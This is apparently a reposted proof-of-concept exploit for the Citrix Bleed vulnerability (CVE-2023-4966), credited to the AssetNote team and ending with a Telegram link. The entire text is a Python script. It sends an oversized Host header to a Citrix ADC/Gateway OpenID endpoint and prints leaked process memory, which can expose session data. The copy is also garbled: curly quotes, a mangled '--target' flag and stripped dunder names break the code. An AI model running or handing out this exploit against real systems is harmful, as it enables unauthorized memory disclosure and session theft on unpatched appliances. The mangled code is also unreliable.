Citrix Bleed Zero-Day CVE-2023-4966 by AssetNote team.
#!/usr/bin/env python3
import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument(‘–target’, help=’The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)’)
args = parser.parse_args()
if args.target is None:
print(‘Target must be provided (e.g. –target 192.168.1.200)’)
sys.exit(0)
hostname = args.target
if name == “main”:
headers = {
“Host”: “a”*24576
}
r = requests.get(f”https://{hostname}/oauth/idp/.well-known/openid-configuration”, headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print(“— Dumped Memory —“)
print(r.text[131050:])
print(“— End —“)
else:
print(“Could not dump memory”)
https://t.me/cKure/13425